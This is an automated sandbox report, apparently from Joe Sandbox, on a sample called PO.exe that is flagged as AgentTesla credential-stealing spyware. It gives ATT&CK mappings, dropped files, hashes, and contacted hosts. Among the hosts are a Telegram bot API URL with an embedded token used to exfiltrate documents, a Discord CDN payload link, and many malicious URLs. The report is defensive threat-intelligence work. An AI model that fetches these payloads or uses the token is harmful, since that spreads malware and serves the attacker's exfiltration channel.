Source: Yara match	File source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 00000004.00000002.89339190222.000000001D990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Web Service	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Native API	1 Windows Service	1 Access Token Manipulation	1 Obfuscated Files or Information	21 Input Capture	127 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 Windows Service	1 DLL Side-Loading	1 Credentials in Registry	331 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	21 Encrypted Channel	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	111 Process Injection	11 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	21 Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	241 Virtualization/Sandbox Evasion	LSA Secrets	241 Virtualization/Sandbox Evasion	SSH	2 Clipboard Data	Data Transfer Size Limits	14 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	111 Process Injection	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO.exe	29%	Virustotal		Browse
PO.exe	27%	ReversingLabs	Win32.Downloader.Nemesis

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://sFTel9k7EYFPshk.comt-Wl	0%	Avira URL Cloud	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	Avira URL Cloud	safe
https://sFTel9k7EYFPshk.com	0%	Avira URL Cloud	safe
http://bLCeYs.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn.discordapp.com	162.159.133.233	true	false		high
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cdn.discordapp.com/attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocx	false		high
https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org	CasPol.exe, 00000004.00000002.89339592068.000000001D9C0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.89340758768.000000001DA29000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocumentdocument-----	CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sFTel9k7EYFPshk.com	CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.89339798750.000000001D9D4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.google.com/chrome/?p=plugin_flash	CasPol.exe, 00000004.00000002.89337792205.000000001D922000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.discordapp.com/	CasPol.exe, 00000004.00000002.89316980207.00000000014CB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	PO.exe	false		high
https://sFTel9k7EYFPshk.comt-Wl	CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.telegram.org	CasPol.exe, 00000004.00000002.89339798750.000000001D9D4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CasPol.exe, 00000004.00000002.89339592068.000000001D9C0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://bLCeYs.com	CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocxT	CasPol.exe, 00000004.00000002.89317391968.0000000001506000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.discordapp.com/attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocxt	CasPol.exe, 00000004.00000002.89317391968.0000000001506000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
162.159.133.233	cdn.discordapp.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	756266
Start date and time:	2022-11-29 22:45:33 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PO.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/7@2/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 34.2% (good quality ratio 33.7%) Quality average: 87.7% Quality standard deviation: 21.4%
HCA Information:	Successful, ratio: 98% Number of executed functions: 186 Number of non-executed functions: 79
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, wdcp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
149.154.167.220	shipping docs.exe	Get hash	malicious	Browse
	BL-SHIPPING DOCUMENTS.exe	Get hash	malicious	Browse
	scan Document_SA26844823746789e.PDF.html	Get hash	malicious	Browse
	Ziraat-bankasiSwiftMessaji2911202245344.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Win32.PWSX-gen.7918.18477.exe	Get hash	malicious	Browse
	AWB DHL 7214306201 Shipment.pdf (432).exe	Get hash	malicious	Browse
	SecuriteInfo.com.Win32.PWSX-gen.7585.24753.exe	Get hash	malicious	Browse
	IMG_2022028022-0120.vbs	Get hash	malicious	Browse
	hesaphareketi-01.pdf.exe	Get hash	malicious	Browse
	PO.exe	Get hash	malicious	Browse
	500 126.html	Get hash	malicious	Browse
	500 126.html	Get hash	malicious	Browse
	Carta de pago.exe	Get hash	malicious	Browse
	INVOICE SHIPPING-PACKING LIST.exe	Get hash	malicious	Browse
	FedEx Express AWB#53053232097Receipt.exe	Get hash	malicious	Browse
	Rfq#Specification.exe	Get hash	malicious	Browse
	SHIPPING INVOICE-PACKING LIST DOCS.exe	Get hash	malicious	Browse
	IMG_202202811-0443.vbs	Get hash	malicious	Browse
	hesaphareketi-01.exe	Get hash	malicious	Browse
	DHLDOCUMENTS27011222.exe	Get hash	malicious	Browse
162.159.133.233	DHL_SHIPMENTS.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/1012640888754819173/1012643262537928734/DHL_SHIPMENTS_Olorqccl.bmp
	SecuriteInfo.com.W32.FakeDoc.CY.genEldorado.18918.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/956928735397965906/1006148111393116200/yXfZJqhIAtCWEPINOAX189.thn
	64AE5410F978DF0F48DCC67508820EA230C566967E002.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
	PO - Drawings And Specifications Sheet_pdf.scr.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/472051232014598144/935778066171580456/Sjddks44.jpg
	BFSdrqaAvS.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/878034206570209333/908436663947124756/slhost.exe
	GR01DtRd0N.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/575791168713916457/896907138390192158/ETH2.exe
	update[1].exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/870656611562180611/873962758427783228/4401fbad77d12fbc.dll
	trinitymediaorder-po140521.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/843047034843955224/843047170223243314/NioR5xJ1XC9a9v2.exe
	NeworderWJO-002,pdf.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/841906355832750103/842664739850944512/zBdd3DFJml9UrbJ.exe
	proforma invoice No. 42037,pdf.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/809311531652087809/839379299009298442/Log_snake.exe
	Proforma adjunta N#U00ba 42037,pdf.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/809311531652087809/839093777200971776/snake_crypted.exe
	Bon_Commande.BC106823.1602202.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/801091101888741379/818969220003790912/fodx.exe
	PO81105083.xlsx	Get hash	malicious	Browse	cdn.discordapp.com/attachments/801449801975726095/801450821929009152/Purchase_Order.exe
	Final documents.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/788973775433498687/788974151649722398/damianox.scr
	009845673.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/788973775433498687/788974151649722398/damianox.scr
	bPT6aeEo8O.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/785404703725977620/785404954315194398/buildkelly.exe
	00094321 Order.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.discordapp.com	Invoice-N192793.xls	Get hash	malicious	Browse	162.159.135.233
	Setup.exe	Get hash	malicious	Browse	162.159.129.233
	Xi5jMqYwwB.exe	Get hash	malicious	Browse	162.159.129.233
	Software.exe	Get hash	malicious	Browse	162.159.135.233
	PO#specification803.dll	Get hash	malicious	Browse	162.159.130.233
	PO#specification803.dll	Get hash	malicious	Browse	162.159.135.233
	DOGLAA84299.dll	Get hash	malicious	Browse	162.159.135.233
	DOGLAA84299.dll	Get hash	malicious	Browse	162.159.134.233
	ORD221125_001,pdf.exe	Get hash	malicious	Browse	162.159.134.233
	file.exe	Get hash	malicious	Browse	162.159.134.233
	file.exe	Get hash	malicious	Browse	162.159.129.233
	file.exe	Get hash	malicious	Browse	162.159.134.233
	file.exe	Get hash	malicious	Browse	162.159.135.233
	file.exe	Get hash	malicious	Browse	162.159.130.233
	file.exe	Get hash	malicious	Browse	162.159.134.233
	file.exe	Get hash	malicious	Browse	162.159.134.233
	file.exe	Get hash	malicious	Browse	162.159.133.233
	qsu3KRECRS.exe	Get hash	malicious	Browse	162.159.133.233
	file.exe	Get hash	malicious	Browse	162.159.129.233
	D41A8BD001FEDA9AD29B5178CB438C2E23FC4FB977592.exe	Get hash	malicious	Browse	162.159.129.233
api.telegram.org	shipping docs.exe	Get hash	malicious	Browse	149.154.167.220
	BL-SHIPPING DOCUMENTS.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.23740.23288.exe	Get hash	malicious	Browse	149.154.167.220
	scan Document_SA26844823746789e.PDF.html	Get hash	malicious	Browse	149.154.167.220
	Ziraat-bankasiSwiftMessaji2911202245344.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Win32.PWSX-gen.7918.18477.exe	Get hash	malicious	Browse	149.154.167.220
	AWB DHL 7214306201 Shipment.pdf (432).exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Win32.PWSX-gen.7585.24753.exe	Get hash	malicious	Browse	149.154.167.220
	IMG_2022028022-0120.vbs	Get hash	malicious	Browse	149.154.167.220
	hesaphareketi-01.pdf.exe	Get hash	malicious	Browse	149.154.167.220
	PO.exe	Get hash	malicious	Browse	149.154.167.220
	500 126.html	Get hash	malicious	Browse	149.154.167.220
	500 126.html	Get hash	malicious	Browse	149.154.167.220
	Carta de pago.exe	Get hash	malicious	Browse	149.154.167.220
	INVOICE SHIPPING-PACKING LIST.exe	Get hash	malicious	Browse	149.154.167.220
	FedEx Express AWB#53053232097Receipt.exe	Get hash	malicious	Browse	149.154.167.220
	Rfq#Specification.exe	Get hash	malicious	Browse	149.154.167.220
	SHIPPING INVOICE-PACKING LIST DOCS.exe	Get hash	malicious	Browse	149.154.167.220
	IMG_202202811-0443.vbs	Get hash	malicious	Browse	149.154.167.220
	hesaphareketi-01.exe	Get hash	malicious	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TELEGRAMRU	shipping docs.exe	Get hash	malicious	Browse	149.154.167.220
	XJXuWlR8TZ.exe	Get hash	malicious	Browse	149.154.167.99
	BL-SHIPPING DOCUMENTS.exe	Get hash	malicious	Browse	149.154.167.220
	7a087c1bcd038c61ddb0f634f9b21e6db9bed59842f19.exe	Get hash	malicious	Browse	149.154.167.99
	file.exe	Get hash	malicious	Browse	149.154.167.99
	c7oqCiKzbF.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.Win32.PWSX-gen.9296.19888.exe	Get hash	malicious	Browse	149.154.167.99
	scan Document_SA26844823746789e.PDF.html	Get hash	malicious	Browse	149.154.167.220
	Ziraat-bankasiSwiftMessaji2911202245344.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Win32.PWSX-gen.7918.18477.exe	Get hash	malicious	Browse	149.154.167.220
	AWB DHL 7214306201 Shipment.pdf (432).exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Win32.PWSX-gen.7585.24753.exe	Get hash	malicious	Browse	149.154.167.220
	synapse3.zip	Get hash	malicious	Browse	149.154.167.99
	00000000.exe	Get hash	malicious	Browse	149.154.167.99
	IMG_2022028022-0120.vbs	Get hash	malicious	Browse	149.154.167.220
	hesaphareketi-01.pdf.exe	Get hash	malicious	Browse	149.154.167.220
	PO.exe	Get hash	malicious	Browse	149.154.167.220
	500 126.html	Get hash	malicious	Browse	149.154.167.220
	500 126.html	Get hash	malicious	Browse	149.154.167.220
	Carta de pago.exe	Get hash	malicious	Browse	149.154.167.220
CLOUDFLARENETUS	Benefits_Enrollment.html	Get hash	malicious	Browse	104.16.123.96
	http://allmaxhomev.ml	Get hash	malicious	Browse	104.17.25.14
	https://mizuhosi.mobirisesite.com/	Get hash	malicious	Browse	104.17.25.14
	Orden de compra #PO0670.vbs	Get hash	malicious	Browse	188.114.96.3
	Paid_invoice.html	Get hash	malicious	Browse	104.18.11.207
	Markelcorp Pay Application November 29, 2022_11725512247820161423.html	Get hash	malicious	Browse	104.17.25.14
	https://tmsnp.page.link/?link=https%3A%2F%2Fbonsalpaint.com%2Fnicas%2F%3Fe%3Dmarshallg%40berger.ca	Get hash	malicious	Browse	104.21.72.10
	https://cialistabspharmacy.com/polaris/?aW52b2ljZUBlbWVyZ2lmaS5jb20=&d=DwMFAg	Get hash	malicious	Browse	104.17.25.14
	Markelcorp Pay-Application Completed November 29, 2022_48707712230774110046.html	Get hash	malicious	Browse	104.17.24.14
	https://soilanalysis.co.in/protectedmessage.html	Get hash	malicious	Browse	172.64.132.15
	paystub_11_24_2022.html	Get hash	malicious	Browse	104.16.85.20
	Remittance.html	Get hash	malicious	Browse	104.17.25.14
	November Draw Disbursed.html	Get hash	malicious	Browse	172.67.188.128
	http://openeye.net	Get hash	malicious	Browse	172.67.69.73
	http://www.golemcoin.net/	Get hash	malicious	Browse	188.114.96.3
	November Draw Disbursed.html	Get hash	malicious	Browse	188.114.97.3
	http://web.jiont2.com	Get hash	malicious	Browse	188.114.96.3
	https://storageapi.fleek.co/9db0d41e-e2fe-4afc-b36b-6d83510d030c-bucket/indexx.html	Get hash	malicious	Browse	104.18.6.145
	NHYGUnNN.exe	Get hash	malicious	Browse	172.67.148.132
	Fwd_ Payment_Confirmation.msg	Get hash	malicious	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	shipping docs.exe	Get hash	malicious	Browse	149.154.167.220
	BL-SHIPPING DOCUMENTS.exe	Get hash	malicious	Browse	149.154.167.220
	cryptor.bin.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Get hash	malicious	Browse	149.154.167.220
	SIEM_PO00938467648.vbs	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe	Get hash	malicious	Browse	149.154.167.220
	SHIPMENT DOCUMENTS.exe	Get hash	malicious	Browse	149.154.167.220
	file.exe	Get hash	malicious	Browse	149.154.167.220
	SkyNet.1448.exe	Get hash	malicious	Browse	149.154.167.220
	SkyNet.1448.exe	Get hash	malicious	Browse	149.154.167.220
	solicitud de presupuesto 29-11-2022.exe	Get hash	malicious	Browse	149.154.167.220
	library.dll	Get hash	malicious	Browse	149.154.167.220
	MACHINE SPECIFICATIONS.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exe	Get hash	malicious	Browse	149.154.167.220
	MEPS-42.exe	Get hash	malicious	Browse	149.154.167.220
	11-29-22.exe	Get hash	malicious	Browse	149.154.167.220
	ORDER.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exe	Get hash	malicious	Browse	149.154.167.220
	Quotation.exe	Get hash	malicious	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	Benefits_Enrollment.html	Get hash	malicious	Browse	162.159.133.233
	Markelcorp Pay Application November 29, 2022_11725512247820161423.html	Get hash	malicious	Browse	162.159.133.233
	https://cialistabspharmacy.com/polaris/?aW52b2ljZUBlbWVyZ2lmaS5jb20=&d=DwMFAg	Get hash	malicious	Browse	162.159.133.233
	era 1.exe	Get hash	malicious	Browse	162.159.133.233
	Markelcorp Pay-Application Completed November 29, 2022_48707712230774110046.html	Get hash	malicious	Browse	162.159.133.233
	Remittance.html	Get hash	malicious	Browse	162.159.133.233
	November Draw Disbursed.html	Get hash	malicious	Browse	162.159.133.233
	November Draw Disbursed.html	Get hash	malicious	Browse	162.159.133.233
	7a087c1bcd038c61ddb0f634f9b21e6db9bed59842f19.exe	Get hash	malicious	Browse	162.159.133.233
	https://dobredrogi.exone-web.pl/INDEX.Php/login/ses/	Get hash	malicious	Browse	162.159.133.233
	http://web.jiont2.com	Get hash	malicious	Browse	162.159.133.233
	https://b6dj2ueylkg.juraganrc.com/?url=aHR0cHM6Ly9ob2xseS1sYXZlbmRlci1yYXR0bGVzbmFrZS5nbGl0Y2gubWUvdmlsZC5odG1s	Get hash	malicious	Browse	162.159.133.233
	0321423605241625.exe	Get hash	malicious	Browse	162.159.133.233
	PDF.shtml	Get hash	malicious	Browse	162.159.133.233
	Notification Details.html	Get hash	malicious	Browse	162.159.133.233
	https://schemevolcanosuspicions.com	Get hash	malicious	Browse	162.159.133.233
	ojPXdB4WTz.exe	Get hash	malicious	Browse	162.159.133.233
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fpostsign.web.app/r9s0h3lind07rhinda51arn0h3ldr9slarkd07r9s0h3nW1&c=92652	Get hash	malicious	Browse	162.159.133.233
	https://bafybeiajl7jy5rq7cttxjilmyeun7jxorxidbcrh6td4a5z6om7jqgofiq.ipfs.w3s.link/meuro4elpez_cham-e.html#glenergy@glenergy.com	Get hash	malicious	Browse	162.159.133.233
	https://libertymutual-my.sharepoint.com/:u:/p/avrial_cloud/Ef8voSU0ijFBkCGrbzr79P0B5chArPhF10rZzMyHQ8-awQ?email=jmiller%40wickersmith.com&e=nYNYdb	Get hash	malicious	Browse	162.159.133.233

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll	RFQ Maranata -Madrid S.L(spares and equipment).exe	Get hash	malicious	Browse
	RFQ Maranata -Madrid S.L(spares and equipment).exe	Get hash	malicious	Browse
	Bestellingen voor november.exe	Get hash	malicious	Browse
	Bestellingen voor november.exe	Get hash	malicious	Browse
	pK4MWvGh3W.exe	Get hash	malicious	Browse
	pK4MWvGh3W.exe	Get hash	malicious	Browse
	unsere Anfrage von.exe	Get hash	malicious	Browse
	unsere Anfrage von.exe	Get hash	malicious	Browse
	Nowe zapytanie projektowe do wyceny.PDF.exe	Get hash	malicious	Browse
	Nowe zapytanie projektowe do wyceny.PDF.exe	Get hash	malicious	Browse
	Nowe zapytanie projektowe do wyceny.PDF.exe	Get hash	malicious	Browse
	Bathroom Product List.exe	Get hash	malicious	Browse
	Bathroom Product List.exe	Get hash	malicious	Browse
	#U00d6deme belgesi 10.12.2022_pdf.exe	Get hash	malicious	Browse
	#U00d6deme belgesi 10.12.2022_pdf.exe	Get hash	malicious	Browse
	RFQ.doc	Get hash	malicious	Browse
	Zahlungsbesttigung.doc	Get hash	malicious	Browse
	RFQ 0102022.exe	Get hash	malicious	Browse
	RFQ 0102022.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes\Incongeniality\Ableptically\Omfattede\Iblanding\Heterodoxical.Ufo

Download File

Process:	C:\Users\user\Desktop\PO.exe
File Type:	data
Category:	dropped
Size (bytes):	169298
Entropy (8bit):	6.993422708563822
Encrypted:	false
SSDEEP:	3072:3H36doFRBxbYjEigfKAFBx4klY9HcLYO6P7tbLkXlBDPn4rrHIRqkFjOjz:XHRojYfLqkqFZbSjDKrSnpOH
MD5:	E9CD51B8DF0E079A6D84286C4F8FB583
SHA1:	30BB91305F4BAD22563D16D837405BD105982218
SHA-256:	B1DFFFB8EE9D8CB22BF5C8660D793719ACFEC38A08F2A78E90EE8D4067512159
SHA-512:	D33B5DED1B891A2BEB68B0127FFB8E0B30AE3856877F7BEF93D42440D15FFEF6EADC8007137E0BC1B1257CB09777344B22773CEA9F9FDDC81FBDAC3A66DF65AD
Malicious:	false
Reputation:	low
Preview:	.:.V,:.. E....-^,z..3U.g...v.Q.sY..x.....@...m\|..I...V.y...@.....S.....G.+...UQg5...@..:..o8.v.j.5.<../..3..0,E.b.v...._...h..b...J.M..._.E/x24.K...\.R......X.~...._4..%...2\.....:6.5.>E...N&j)yc.F....o....R.tZZ.F.UW....0.........N.,GTMj.......I........[{..0U..4..3..,.l$..}.g.&.u..!.".lstg.5..{..~az..U..J.....j.c[...z.j./...!m.......Cy.U....X.. 9...@..V$...M..%...O.@..V5......+".}.4.>.....<..e..........;..b9;"D...&E.....A_Q.%..^..t.N&1^....c.....G..h=H.....?.....W.......`.4..,..3.IaaH.B.ZmB....f.J.....a..(p.-X.....f..W.'.D(O...,..4..cG............/G./..^....6X..x.CD{\g.....{...F:..4...tJ>J..=..#K...-............v...f....J.=7@oM.e.$l..U..m..<..:.O6.,...\.Y\|[do.8.w....#]2..f.. ....[...J....g.h`.....Q.f.C_..T...iIR.....A..%t._6fYH.]g.....o.i.c..U.H...h....M...@.n...9.[t.X.....o......t......%PWY.t@..Ce..WG.%.l..b}eF....B.6K.N....Qf.C.P....f....2.>.#...3.5Y.=...d..3......\f.J..9S.16bQ...}..'.g..M.l.B^e\.8...A.L....v.p..u......:....Y~t...i...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes\Referenceliste\holdovers\open-menu-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\PO.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	314
Entropy (8bit):	4.555782614723155
Encrypted:	false
SSDEEP:	6:TMVBd/6o8GUYl/n7S3mc4slLlNkRI7NtAlaRI7SdtAlaRI7UNtAlBC:TMHdPnnl/nu3tln7NWlz7MWlz7UNWlM
MD5:	53C42FCA9E64A93B4C572D5BA805FD4D
SHA1:	1659423CA8F981CFD2EEB6ADD25C03CA5B37FFBD
SHA-256:	DD3F1C117437A6F5124905DE7212A1A320E76F9B33D8411BF70DBDBEFA8E9BAD
SHA-512:	2852EB784E5090F298259F04516C1413734ECF20EA7D143864FE0312A6410E83FFF49E16DCE3CF7F61177238B4DECEBD540FD839E3721965A5141856908392DD
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <g fill="#2e3436">. <path d="m 1 2 h 14 v 2 h -14 z m 0 0"/>. <path d="m 1 7 h 14 v 2 h -14 z m 0 0"/>. <path d="m 1 12 h 14 v 2 h -14 z m 0 0"/>. </g>.</svg>.

C:\Users\user\AppData\Local\Temp\TOBEN.lnk

Download File

Process:	C:\Users\user\Desktop\PO.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	850
Entropy (8bit):	2.925859933343773
Encrypted:	false
SSDEEP:	12:8gl0gsXUCV/tz+7RafgKD7mWH/rNJkKAh4t2YCBTo8:8/raRMgKh5HALJT
MD5:	AF9FC18C6E2F55A80586FD4B43D24674
SHA1:	482192CAF81B1E06F761929AFF7CAADB8D91328A
SHA-256:	500184B06DBC9F859D31AF68D726A7C282D6016E1ABE241A80BF4119C1A073F7
SHA-512:	9DFE5CA18F0E68C868BDE1C0ADC5CB20B38C0D08570769935D1EE53803E4D33E1E949C422FD80F395B250A897219339F97D7198ADDEB86A94A887084D8EA76CF
Malicious:	false
Reputation:	low
